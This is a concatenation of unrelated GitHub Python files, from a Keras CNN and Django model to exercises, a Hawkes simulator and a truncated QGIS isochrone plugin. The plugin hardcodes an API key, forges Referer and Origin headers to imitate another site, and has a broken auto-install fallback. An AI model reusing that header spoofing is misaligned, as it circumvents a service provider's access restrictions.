LossHistory()\n\nwith tf.device('/gpu:1'):\n    classifier.fit_generator(training_set,\n                        steps_per_epoch=8000/batch_size,\n                        epochs=90,\n                        validation_data=test_set,\n                        validation_steps=2000/batch_size,\n                        workers=8,\n#                        max_q_size=300,\n                        callbacks=[history])\n\nimport numpy as np\nfrom keras.preprocessing import image\n\ntest_image = image.load_img('dataset/single_prediction/6.jpg', target_size=(64, 64))\ntest_image = image.img_to_array(test_image)\ntest_image = np.expand_dims(test_image,axis=0)\n\nresult = classifier.predict(test_image)\ntraining_set.class_indices\nif result[0][0] == 1:\n    prediction = 'dog'\nelse:\n    prediction = 'cat'\n\nprint(prediction)\n","repo_name":"DaniVSainz/DeepLearning_A-Z","sub_path":"Volume 1 - Supervised Deep Learning/Part 2 - Convolutional Neural Networks (CNN)/Section 8 - Building a CNN/Convolutional_Neural_Networks/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35614729891","text":"from math import factorial\nfrom typing import List, Callable, Tuple\nfrom sqlparse.sql import Identifier\nimport itertools\nfrom .JoinNode import JoinNode, JoinData\nfrom codegen.table import FreeConnexTable, Table\n\n\nclass FreeConnexJoinNode(JoinNode):\n    \"\"\"\n    A join node which will try to create a free connex join. However, it won't guarantee the generated\n    join tree will be a free connex join tree.\n    \"\"\"\n\n    def __init__(self, join_list: List[JoinData], tables: List[Table],\n                 is_free_connex_table: Callable[[], Tuple[bool, List[Table]]]):\n        \"\"\"\n        Initialize a Free Connex Join Node.\n\n        :param join_list: a list of join data. 
Each entry includes a left key and a right key.\n        :param tables: A list of tables\n        :param is_free_connex_table: A function which can be used to test if one join tree is a free connex join tree\n        \"\"\"\n\n        super().__init__(join_list, tables)\n        self.is_free_connex_table = is_free_connex_table\n\n    def merge(self):\n        \"\"\"\n        Enumerate all possible join trees in order to find the free connex join tree\n        :return:\n        \"\"\"\n        self.preprocess_join_list()\n        length = len(self.join_list)\n\n        # Will generate a list of combinations with 0 and 1\n        # 0 means will perform left to right join\n        # 1 means will perform right to left join\n        # this will let the program enumerate all the possible join trees\n        # in order to find the free connex join tree\n        combinations = list(itertools.product([0, 1], repeat=length))\n\n        for i, combination in enumerate(combinations):\n            # e.g. (0, 0, 0)\n            combination: Tuple[int]\n\n            self.__perform_join__(combination)\n            is_free_connex, _ = self.is_free_connex_table()\n            if not is_free_connex:\n                if i == len(combinations) - 1:\n                    pass\n\n                else:\n                    self.__clear_join__()\n            else:\n                break\n\n    def __perform_join__(self, combination: Tuple[int]):\n        \"\"\"\n        Perform the joins described by ``self.join_list``. For each join, the matching\n        entry in ``combination`` selects the direction: 0 joins the left table to the\n        right one, 1 joins the right table to the left one.\n        :param combination: tuple of 0/1 direction flags, one per join\n        :return:\n        \"\"\"\n        for i, c in enumerate(self.join_list):\n            c: JoinData\n            left_table = None\n            right_table = None\n            for table in self.tables:\n                column_names = [t.name for t in table.original_column_names]\n\n                if str(c.right) in column_names and not right_table:\n                    right_table = table\n                    continue\n\n                if str(c.left) in column_names and not left_table:\n                    left_table = table\n\n            if left_table and right_table:\n                if combination[i] == 1:\n                    right_table.join(left_table, str(c.right), str(c.left))\n                else:\n                    left_table.join(right_table, str(c.left), str(c.right))\n                left_table.used_in_join = True\n                right_table.used_in_join = True\n                # left_table.join(right_table, str(c.left), str(c.right))\n                if left_table not in self.join_tables:\n                    self.join_tables.append(left_table)\n\n                if right_table not in self.join_tables:\n                    self.join_tables.append(right_table)\n\n            else:\n                if not left_table and type(c.left) is Identifier:\n                    raise RuntimeError(f\"Cannot find related join column: {c.left}\")\n                elif not right_table and type(c.right) is Identifier:\n                    raise RuntimeError(f\"Cannot find related join column: {c.right}\")\n\n    def __clear_join__(self):\n        \"\"\"\n        Clear all joins\n        :return:\n        \"\"\"\n        for table in self.join_tables:\n            table.clear_join()\n\n        self.join_tables = []\n","repo_name":"secyan/secyan_gen","sub_path":"codegen/node/cpp_nodes/FreeConnexJoinNode.py","file_name":"FreeConnexJoinNode.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"40893572550","text":"from django.contrib.auth.models import AbstractUser\r\nfrom django.contrib.auth.validators import UnicodeUsernameValidator\r\nfrom django.db import models\r\n\r\n\r\nclass Users(AbstractUser):\r\n    username = models.CharField(\r\n        'Имя пользователя',\r\n        max_length=30,\r\n        validators=[UnicodeUsernameValidator],\r\n        unique=True,\r\n    )\r\n\r\n    class Meta:\r\n        ordering = ('id',)\r\n        verbose_name = 'Пользователь'\r\n        verbose_name_plural = 'Пользователи'\r\n\r\n    def __str__(self):\r\n        return 
self.username\r\n","repo_name":"borrrv/news","sub_path":"backend/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36364707342","text":"def open_print(file_name):\n    try:\n        opened_file = open(file_name, 'r')\n        lines = opened_file.readlines()\n        for line in lines:\n            print(line.strip('\\n'))\n\n        opened_file.close() # closes the file, so can be saved without conflict\n\n    except FileNotFoundError as error_message: # original error message\n        print('Check file name/path - File cannot be found')\n        print(error_message)\n        # raise\n\ndef open_print_close(file_name):\n    try:\n        with open(file_name, 'r') as file:\n            lines = file.readlines()\n            for line in lines:\n                print(line.strip('\\n'))\n    except FileNotFoundError as error:\n        print('Check your file')\n        print(error)\n    finally:\n        print('Program ending')\n\ndef open_write_txt(file, item):\n    try:\n        with open(file, 'a') as file_to_write:\n            file_to_write.write(item + '\\n')\n    except FileNotFoundError as error:\n        print('Check your file/path')\n        print(error)\n    finally:\n        print('Program ending')\n\nopen_write_txt('order2.txt', 'cupcake')\nopen_write_txt('order2.txt', 'OJ with carrot')\nopen_write_txt('order2.txt', 'Beans on toast')\nopen_write_txt('order2.txt', 'Eggs Benedict')\nopen_print_close('order2.txt')\n","repo_name":"dilanmorar/opening_writing_error_handling_files","sub_path":"orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70267300989","text":"\nimport epyk as pk\n\n\npage = pk.Page()\npage.headers.dev()\n\n# Console component\nc = page.ui.rich.console(\n    \"* This is a log section for all the events in the different buttons *\", options={\"timestamp\": True})\n\n# Create two default timepickers with different dates\nfirst = page.ui.fields.now(label=\"timestamp\", color=\"red\", helper=\"This is the report timestamp\")\ncurrent = page.ui.fields.now(label=\"Time field\", deltatime=-60)\n\n# Create a bespoke one with a fixed time\nmorning = page.ui.fields.time(\"8:13:00\", label=\"Time field\")\nmorning.options.interval = 60\n\n# Add event when the timepicker object changes\nmorning.change([\n    c.dom.write(\"'time'\", skip_data_convert=True)\n])\n\n# Add button to retrieve the value of the different timepickers\npage.ui.button(\"Click\").click([\n    c.dom.write(current.input.dom.content),\n    c.dom.write(first.input.dom.val, stringify=True),\n    first.input.js.value(\"9:00:00\"),\n    current.input.build(\"9:00:00\"),\n])\n\nc.move()\n","repo_name":"epykure/epyk-templates","sub_path":"locals/packages/timepicker.py","file_name":"timepicker.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"6"} +{"seq_id":"30764062823","text":"# Serializing an object and retrieving its data\nimport pickle\n\n\nclass Vehicles():\n    def __init__(self, brand, model):\n\n        self.brand = brand\n        self.model = model\n        self.running = False\n        self.speedUp = False\n        self.brake = False\n\n    def startEng(self):\n\n        self.running = True\n\n    def spdUp(self):\n\n        self.speedUp = True\n\n    def stop(self):\n\n        self.brake = True\n\n    def vehStatus(self):\n\n        print('Brand: ', self.brand, '\\nModel: ', self.model, '\\nRunning: ',\n              self.running, '\\nSpeeding Up: ', self.speedUp, '\\nBraking: ', self.brake)\n\n\nmyCar1 = Vehicles('Ferrari', 
'Spider')\nmyCar2 = Vehicles('Porsche', '911')\nmyCar3 = Vehicles('Audi', 'Q3')\n\nmyCars = [myCar1, myCar2, myCar3]\n\nobjBinaryFile = open('MyCars', 'wb') # Creating the binary file\n\npickle.dump(myCars, objBinaryFile) # Dumping the object into the binary file\n\nobjBinaryFile.close()\n\ndel (objBinaryFile)\n\n# Retrieving the object from the binary file\n\nretBinary = open('MyCars', 'rb') # Opening the file on reading binary mode\n\n# Saving the objects on the retCarList variable\nretCarList = pickle.load(retBinary)\n\nretBinary.close() # Closing the file\n\nfor c in retCarList:\n    print(c.vehStatus()) # Printing objects from the list, one by one\n","repo_name":"Giorc93/PythonCourse","sub_path":"Serialization/serialization2.py","file_name":"serialization2.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"36272456475","text":"# harrison frahn\n# period 2\n# chapter 7.5\n# expected input: the number of how many bags were filled (an integer)\ndef main():\n\ttry:\n\t\tbags = eval(input(\"Enter the number of bags of litter filled: \"))\n\t\tif bags%1==0 and bags > 0:\n\t\t\tfine = 75+bags*10\n\t\t\tif bags > 10:\n\t\t\t\tfine += 500\n\t\t\tprint(\"Your fine is \"+str(fine)+'.')\n\t\telif bags <= 0:\n\t\t\tprint(\"You can't fill negative bags!\")\n\t\telif bags%1!=0:\n\t\t\tprint(\"You can't fill a fraction of a bag!\")\n\texcept NameError:\n\t\tprint(\"You entered letters, not a number!\")\n\texcept SyntaxError:\n\t\tprint(\"Either you didn't enter any number, or you entered the number wrong!\") \n\texcept TypeError:\n\t\tprint(\"You entered more than 1 number!\")\n\texcept KeyboardInterrupt:\n\t\tprint(\"\\n\")\n\texcept:\n\t\tprint(\"Something went wrong!!\")\nif __name__ == '__main__':\n\tmain()\n","repo_name":"hrfrahn/functprog","sub_path":"chaper 7 programming projects/ch7_5.py","file_name":"ch7_5.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"730575856","text":"import os\nimport logging\n\nfrom gevent import monkey\nmonkey.patch_all()\n\nfrom app import create_app, db, socketio\nfrom app.models import User, Role, Room, RoomComponent, Object, Widget, StatisticEvent\nfrom app.models import create_sample_db, add_event\n\nfrom flask.ext.script import Manager, Shell\nfrom flask.ext.migrate import Migrate, MigrateCommand\n\n# initialize logging\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n# check installation (errors in Flask-uploads)\nfrom os import name\nfrom os.path import isdir, islink\n\nif name == 'posix':\n    if not isdir('app/uploads') or not islink('uploads'):\n        logger.error(\"Please verify that the app/uploads directory exists and that uploads is a symbolic link to it.\")\n        exit()\nelif name == 'nt':\n    if not isdir('app/uploads') or not isdir('uploads'):\n        logger.error(\"Please verify that the app/uploads directory exists and that uploads is a symbolic link to it.\")\n        exit()\n\n    logger.error(\"Please make sure that uploads is a symbolic link to the app/uploads directory.\")\n\n# create application\napp = create_app(os.getenv('FLASK_CONFIG') or 'default')\nmanager = Manager(app)\nmigrate = Migrate(app, db)\n\n\ndef make_shell_context():\n    return dict(app=app, db=db, 
User=User, Role=Role, Room=Room, RoomComponent=RoomComponent, Widget=Widget, Object=Object)\n\nmanager.add_command('shell', Shell(make_context=make_shell_context))\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.command\ndef test():\n    import unittest\n    tests = unittest.TestLoader().discover('tests')\n    unittest.TextTestRunner(verbosity=2).run(tests)\n\n\n@manager.command\ndef sample_db():\n    create_sample_db()\n\n\n@manager.command\ndef server():\n    socketio.run(app, host='0.0.0.0', port=16000, policy_server=False)\n\nif __name__ == '__main__':\n    manager.run()\n","repo_name":"compeit-open-source/dashboard","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"27742022676","text":"# grouping with dictionaries\nfrom collections import defaultdict  # needed for the defaultdict example below\n\nnames = ['raymond', 'rachel', 'matthew', 'roger',\n         'betty', 'melissa', 'judith', 'charlie']\n\nd = {}\nfor name in names:\n\tkey = len(name)\n\tif key not in d:\n\t\td[key] = []\n\td[key].append(name)\n# start with an empty dictionary\n# the key is the value one wishes to group by\n\n# e.g. raymond is of length 7, along with all the names\n# to group by anything else, just change the key line\n# e.g. by the first letter, or the number of e's in the name\n# a better way\nd = {}\nfor name in names:\n\tkey = len(name)\n\td.setdefault(key, []).append(name)\n# we need to return the list so we can append to it\n# but also need to be inserted in\n# setdefault is just like get but has the side effect of\n# inserting the missing key\n# e.g. this goes into the dictionary see if the key is there\n# if it's not, takes the default value and inserts it\n# and returns it so you can group with it\n\n# a better way\nd = defaultdict(list)\nfor name in names:\n\tkey = len(name)\n\td[key].append(name)\n# wherever you see #326\n# do this instead\n# looks better, is faster\n","repo_name":"nicolageorge/idiomaticpython","sub_path":"presentation/2 2 grouping dict.py","file_name":"2 2 grouping dict.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74553216826","text":"class Employee:\n    def __init__(self, name, employee_id, job_title, salary):\n        self.name = name\n        self.employee_id = employee_id\n        self.job_title = job_title\n        self.salary = salary\n\n    def __str__(self):\n        return f\"{self.name} (ID: {self.employee_id}, Job Title: {self.job_title}, Salary: {self.salary})\"\n\n\nclass EmployeeManager:\n    def __init__(self):\n        self.employees = []\n\n    def add_employee(self, employee):\n        self.employees.append(employee)\n\n    def remove_employee(self, employee_id):\n        employee = self.find_employee_by_id(employee_id)\n        if employee is not None:\n            self.employees.remove(employee)\n\n    def find_employee_by_id(self, employee_id):\n        for employee in self.employees:\n            if employee.employee_id == employee_id:\n                return employee\n        return None\n\n    def view_employees(self):\n        for employee in self.employees:\n            print(employee)\n\n\ndef main():\n    employee_manager = EmployeeManager()\n\n    while True:\n        print(\"\\nEmployee Record Manager\")\n        print(\"1. Add Employee\")\n        print(\"2. Remove Employee\")\n        print(\"3. View Employees\")\n        print(\"4. 
Exit\")\n\n choice = int(input(\"Enter your choice: \"))\n\n if choice == 1:\n name = input(\"Enter employee name: \")\n employee_id = input(\"Enter employee ID: \")\n job_title = input(\"Enter job title: \")\n salary = float(input(\"Enter salary: \"))\n employee = Employee(name, employee_id, job_title, salary)\n employee_manager.add_employee(employee)\n elif choice == 2:\n employee_id = input(\"Enter employee ID: \")\n employee_manager.remove_employee(employee_id)\n elif choice == 3:\n employee_manager.view_employees()\n elif choice == 4:\n break\n else:\n print(\"Invalid choice. Please try again.\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Bhamdou/exercise_30mar","sub_path":"Employee-Record_Manager.py","file_name":"Employee-Record_Manager.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14975430510","text":"\"\"\"DataUpdateCoordinator for dueros.\"\"\"\nfrom __future__ import annotations\n\nfrom datetime import timedelta\nfrom dueros_smarthome.models import Appliance\nfrom dueros_smarthome.client import SmartHomeClient\nfrom dueros_smarthome.const import STATUS_OK, STATUS_NOT_LOGIN\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.update_coordinator import (\n DataUpdateCoordinator,\n UpdateFailed,\n)\nfrom homeassistant.exceptions import ConfigEntryAuthFailed\n\n\nfrom .const import DOMAIN, LOGGER, BOT_ID_APPLIANCE_ID_SEPARATOR\n\n\ndef get_unique_id(appliance: Appliance) -> str:\n \"\"\"Get appliance's unique ID.\"\"\"\n return f\"{appliance.bot_id}{BOT_ID_APPLIANCE_ID_SEPARATOR}{appliance.appliance_id}\"\n\n\n# https://developers.home-assistant.io/docs/integration_fetching_data#coordinated-single-api-poll-for-data-for-all-entities\nclass DuerOSDataUpdateCoordinator(DataUpdateCoordinator):\n \"\"\"Class to manage fetching data from the API.\"\"\"\n\n config_entry: ConfigEntry\n\n def __init__(\n self,\n hass: HomeAssistant,\n client: SmartHomeClient,\n ) -> None:\n \"\"\"Initialize.\"\"\"\n self.client = client\n super().__init__(\n hass=hass,\n logger=LOGGER,\n name=DOMAIN,\n update_interval=timedelta(seconds=30),\n )\n\n async def _async_update_data(self):\n \"\"\"Update data via library.\"\"\"\n rsp = await self.client.get_device_list()\n if STATUS_NOT_LOGIN == rsp.status:\n LOGGER.error(rsp.msg)\n raise ConfigEntryAuthFailed(rsp.msg)\n if STATUS_OK != rsp.status:\n LOGGER.error(rsp.msg)\n raise UpdateFailed(rsp.msg)\n return {get_unique_id(appliance): appliance for appliance in rsp.appliances}\n","repo_name":"zsy056/dueros-ha","sub_path":"custom_components/dueros/coordinator.py","file_name":"coordinator.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42897251222","text":"import numpy as np\nimport numba as nb\n\nspec = [\n ('lambda_0', nb.float64), ('t_0', nb.float64), ('alpha', nb.float64), ('beta', nb.float64), ('seed', nb.int64),\n ('maxsize', nb.int64),\n\n ('lamb', nb.float64), ('t', nb.float64), ('s', nb.float64), ('u', nb.float64),\n ('lambda_last_jump', nb.float64), ('last_jump', nb.float64), ('last_accepted', nb.boolean),\n ('is_initial', nb.boolean), ('nb_jumps', nb.int64),\n ('jumps', nb.float64[:]), ('finished', nb.boolean)\n]\n\n\n@nb.jitclass(spec)\nclass NumbaHawkesProcess(object):\n \"\"\"\n This classes aims at replicating the algorithm exposed in the pure 
python\n HawkesProcess class above in a numba fashion.\n It will only implement the simulation in itself as all external modules but numpy\n can't be used.\n The signature of the class has to be specified (spec above) and all\n arrays have to be instantiated with a specific length (maxsize).\n\n \"\"\"\n\n def __init__(self, lambda_0, t_0, alpha, beta, seed, maxsize):\n np.random.seed(seed)\n self.lambda_0 = lambda_0\n self.t_0 = t_0\n self.alpha = alpha\n self.beta = beta\n self.seed = seed\n self.maxsize = maxsize\n\n self.lamb = self.lambda_0\n self.t = t_0\n self.s = t_0\n self.u = t_0\n self.lambda_last_jump = self.lamb\n self.last_jump = t_0\n self.last_accepted = True\n self.is_initial = True\n self.nb_jumps = 0\n\n self.jumps = np.empty(maxsize, dtype=np.float64)\n self.finished = False\n\n @staticmethod\n def uniform():\n return np.random.uniform(0., 1.)\n\n @staticmethod\n def exp(lamb):\n return np.random.exponential(1 / lamb)\n\n def _first_jump(self, T):\n\n self.s = self.exp(self.lamb)\n self.finished = self.s > T\n self.is_initial = False\n if not self.finished:\n self.t = self.s\n self.last_jump = self.t\n self.jumps[self.nb_jumps] = self.s\n self.nb_jumps += 1\n\n def _accepted_routine(self):\n self.t = self.s\n self.jumps[self.nb_jumps] = self.t\n self.nb_jumps += 1\n self.last_jump = self.t\n\n def _continue_routine(self):\n if self.last_accepted:\n self._accepted_routine()\n\n def lambda_fun(self):\n lambda_part = self.lamb - self.lambda_0\n lambda_part *= np.exp(-self.beta * (self.s - self.u))\n res = self.lambda_0 + lambda_part\n return res\n\n def _routine(self, T):\n if self.last_accepted:\n self.lamb += self.alpha\n self.u = self.s\n self.s += self.exp(self.lamb)\n\n if self.s > T:\n self.finished = True\n\n if not self.finished:\n temp_lamb = self.lambda_fun()\n self.last_accepted = self.uniform() <= temp_lamb / self.lamb\n self.lamb = temp_lamb\n self._continue_routine()\n\n def _clear(self):\n self = self.__init__(self.lambda_0,\n self.t_0,\n self.alpha,\n self.beta,\n self.seed,\n self.maxsize)\n\n def simulate(self, T):\n self._first_jump(T)\n while not self.finished:\n self._routine(T)\n\n result = self.jumps.copy()\n return result\n\n","repo_name":"AdrienCorenflos/HawkesProcesses","sub_path":"numba_univariate.py","file_name":"numba_univariate.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"38471135684","text":"from pathlib import Path\nfrom qgis.PyQt.QtCore import QSettings, QTranslator, QCoreApplication, QVariant\nfrom qgis.PyQt.QtGui import QIcon\nfrom qgis.PyQt.QtWidgets import QAction\nfrom . import rss_ign\n\n\nfrom qgis.core import QgsProject, QgsVectorLayer, QgsFeature, QgsGeometry, QgsCoordinateReferenceSystem, QgsCoordinateTransform, QgsField, QgsPoint, QgsWkbTypes, QgsPointXY\n\n\n# Import the code for the dialog\nfrom .iso_ign_dialog import IsoIGNDialog\nimport os.path\nimport json, traceback\n\nfrom PyQt5.Qt import QMessageBox\n\n# from pickle import TRUE\n\ntry:\n import requests\nexcept ModuleNotFoundError:\n print(\"installing requests\")\n if platform.system() == \"Windows\":\n subprocess.call([sys.exec_prefix + \"/python\", \"-m\", \"pip\", \"install\", \"requests\"])\n else:\n subprocess.call([\"python3\", \"-m\", \"pip\", \"install\", \"requests\"])\n import requests\n\n try:\n import requests\n\n print(\"installation completed\")\n except ModuleNotFoundError:\n QMessageBox.information(None, \"ERROR\", \"Oops ! 
L'installation du module requests a échoué. Désolé de ne pas pouvoir aller plus loin...\")\n\nheaders = {\"User-Agent\": \"*\"}\nheaders_v1 = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\",\n \"Referer\": \"https://fiddle.jshell.net/\",\n \"Origin\": \"https://fiddle.jshell.net\"}\n\nURL = \"https://itineraire.ign.fr/simple/1.0.0/\"\nIGN_KEY = 'jhyvi0fgmnuxvfv0zjzorvdn'\n\nversion = \"3.5\"\n\n\nclass IsoIGN:\n \"\"\"Un plugin QGIS pour calculer des aires de chalandise et rechercher des itinéraires à l'aide\n du Géoportail de l'IGN.\"\"\"\n\n def __init__(self, iface):\n \"\"\"Constructor.\n\n :param iface: An interface instance that will be passed to this class\n which provides the hook by which you can manipulate the QGIS\n application at run time.\n :type iface: QgsInterface\n \"\"\"\n # Save reference to the QGIS interface and Project Instance\n self.iface = iface\n self.project = QgsProject.instance()\n\n # initialize plugin directory\n self.plugin_dir = os.path.dirname(__file__)\n # initialize locale\n locale = QSettings().value(\"locale/userLocale\")[0:2]\n locale_path = os.path.join(self.plugin_dir, \"i18n\", \"IsoIGN_{}.qm\".format(locale))\n\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n QCoreApplication.installTranslator(self.translator)\n\n # Declare instance attributes\n self.actions = []\n self.menu = self.tr(u\"&IsoIGN\")\n\n # Check if plugin was started the first time in current QGIS session\n # Must be set in initGui() to survive plugin reloads\n self.first_start = None\n\n # noinspection PyMethodMayBeStatic\n def tr(self, message):\n \"\"\"Get the translation for a string using Qt translation API.\n\n We implement this ourselves since we do not inherit QObject.\n\n :param message: String for translation.\n :type message: str, QString\n\n :returns: Translated version of message.\n :rtype: QString\n \"\"\"\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate(\"IsoIGN\", message)\n\n def add_action(self, icon_path, text, callback, enabled_flag=True, add_to_menu=True, add_to_toolbar=True, status_tip=None, whats_this=None, parent=None):\n \"\"\"Add a toolbar icon to the toolbar.\n\n :param icon_path: Path to the icon for this action. Can be a resource\n path (e.g. ':/plugins/foo/bar.png') or a normal file system path.\n :type icon_path: str\n\n :param text: Text that should be shown in menu items for this action.\n :type text: str\n\n :param callback: Function to be called when the action is triggered.\n :type callback: function\n\n :param enabled_flag: A flag indicating if the action should be enabled\n by default. Defaults to True.\n :type enabled_flag: bool\n\n :param add_to_menu: Flag indicating whether the action should also\n be added to the menu. Defaults to True.\n :type add_to_menu: bool\n\n :param add_to_toolbar: Flag indicating whether the action should also\n be added to the toolbar. Defaults to True.\n :type add_to_toolbar: bool\n\n :param status_tip: Optional text to show in a popup when mouse pointer\n hovers over the action.\n :type status_tip: str\n\n :param parent: Parent widget for the new action. Defaults None.\n :type parent: QWidget\n\n :param whats_this: Optional text to show in the status bar when the\n mouse pointer hovers over the action.\n\n :returns: The action that was created. 
Note that the action is also\n added to self.actions list.\n :rtype: QAction\n \"\"\"\n\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n\n if status_tip is not None:\n action.setStatusTip(status_tip)\n\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n\n if add_to_toolbar:\n # Adds plugin icon to Plugins toolbar\n self.iface.addToolBarIcon(action)\n\n if add_to_menu:\n self.iface.addPluginToMenu(self.menu, action)\n\n self.actions.append(action)\n\n return action\n\n def initGui(self):\n \"\"\"Create the menu entries and toolbar icons inside the QGIS GUI.\"\"\"\n\n icon_path = Path(__file__).parent / \"icon.png\"\n self.add_action(str(icon_path), text=self.tr(u\"IsoIGN\"), callback=self.run, parent=self.iface.mainWindow())\n\n # will be set False in run()\n self.first_start = True\n\n def unload(self):\n \"\"\"Removes the plugin menu item and icon from QGIS GUI.\"\"\"\n for action in self.actions:\n self.iface.removePluginMenu(self.tr(u\"&IsoIGN\"), action)\n self.iface.removeToolBarIcon(action)\n\n ########################################################################\n # Fonctions utiles #\n ########################################################################\n\n def get_bornes(self):\n self.u_bornes = self.iso_ign_windows.lineEdit_user_rq.text()\n\n self.u_bornes = self.u_bornes.replace(\" \", \"\")\n if len(self.u_bornes) > 0:\n self.bornes = self.u_bornes.split(\",\")\n\n try:\n self.bornes = [int(i) if self.unit != \"minutes\" else int(i) * 60 for i in self.bornes]\n except ValueError:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Les bornes doivent s'exprimer en chiffres\")\n self.bornes = []\n return self.bornes\n\n return self.bornes\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Liste de bornes vide !\")\n\n def get_param(self):\n\n if self.iso_ign_windows.radioButton_voiture.isChecked():\n self.reseau = \"profile=car\"\n elif self.iso_ign_windows.radioButton_pieton.isChecked():\n self.reseau = \"profile=pedestrian\"\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Veuillez choisir un type de réseau\")\n\n if self.iso_ign_windows.radioButton_distance.isChecked():\n self.methode = \"costType=distance&distanceUnit=meter\"\n self.unit = \"meter\"\n elif self.iso_ign_windows.radioButton_temps.isChecked():\n self.methode = \"costType=time&timeUnit=minute\"\n self.unit = \"minute\"\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Veuillez choisir une méthode de calcul\")\n\n def ask_ign_v1(self, url):\n \"\"\"fonction qui interroge le géoportail et qui retourne la réponse\"\"\"\n # print(url)\n # TODO : tester la connexion\n self.resp = requests.get(url, headers=headers_v1)\n print(headers_v1)\n print(self.resp)\n self.iso_output = self.resp.json()\n\n if self.iso_output:\n\n return self.iso_output\n\n else:\n return \"bug\"\n\n def ask_ign(self, url):\n \"\"\"fonction qui interroge le géoportail et qui retourne la réponse\"\"\"\n # print(url)\n # TODO : tester la connexion\n self.resp = requests.get(url, headers=headers)\n self.iso_output = self.resp.json()\n\n if self.iso_output:\n\n return self.iso_output\n\n else:\n return \"bug\"\n\n ########################################################################\n # Mode Chalandises #\n ########################################################################\n\n def get_iso_v1(self):\n # Initialisation du compteur de réussite\n nb_ok = 0\n\n # Initialisation de la 
liste d'erreures\n lst_bug = []\n\n # Initialisation des paramètres de recherche\n \"\"\"\n Paramètres de l'API v1:\n https://wxs.ign.fr/jhyvi0fgmnuxvfv0zjzorvdn/isochrone/isochrone.json?\n graphName=Voiture&\n method=distance&\n location=-1.583250,43.453710&\n reverse=false&\n exclusions=&\n srs=EPSG:4326&\n smoothing=true&\n holes=true&\n distance=100\n \"\"\"\n urla = 'https://wxs.ign.fr/'\n urlb = '/isochrone/isochrone.json?location='\n urlc = '&smoothing=true&holes=false&reverse=true&'\n urle = '&srs=EPSG:4326'\n if self.reseau == \"profile=car\":\n graph = \"Voiture\"\n else:\n graph = \"Pieton\"\n \n if self.methode == \"costType=distance&distanceUnit=meter\":\n methode = 'method=distance&distance='\n else:\n methode = 'method=time&time='\n\n # test de présence de bornes\n try:\n rq_bornes = self.get_bornes()\n except Exception:\n self.iso_ign_windows.consol.setText(traceback.format_exc())\n if not rq_bornes:\n return\n\n # test si au moins un point origine est selectioné et reprojection en WGS84\n ori_layer = self.iface.activeLayer()\n selected_pt = ori_layer.selectedFeatures()\n\n if selected_pt:\n crsOri = ori_layer.crs()\n crsDest = QgsCoordinateReferenceSystem(\"EPSG:4326\")\n xform = QgsCoordinateTransform(crsOri, crsDest, self.project)\n for pt in selected_pt:\n ptt = pt.geometry()\n if ptt.type() == QgsWkbTypes.PointGeometry:\n ptt.transform(xform)\n pt.setGeometry(ptt)\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Vous ne pouvez selectionner que des géométrie de type 'Point'\")\n return\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Aucun point selectioné!\")\n return\n\n # création du layer de résultats\n res_ly = QgsVectorLayer(\"Polygon\", \"Aire de chalandise\", \"memory\")\n res_provider = res_ly.dataProvider()\n res_provider.addAttributes(ori_layer.fields())\n res_provider.addAttributes([QgsField(\"iso_cost\", QVariant.Int)])\n res_provider.addAttributes([QgsField(\"iso_unit\", QVariant.String)])\n res_ly.updateFields()\n\n # création du layer d'erreures\n err_ly = QgsVectorLayer(\"Point\", \"Erreures Aire de chalandise\", \"memory\")\n err_provider = err_ly.dataProvider()\n err_provider.addAttributes(ori_layer.fields())\n err_provider.addAttributes([QgsField(\"iso_cost\", QVariant.Int)])\n 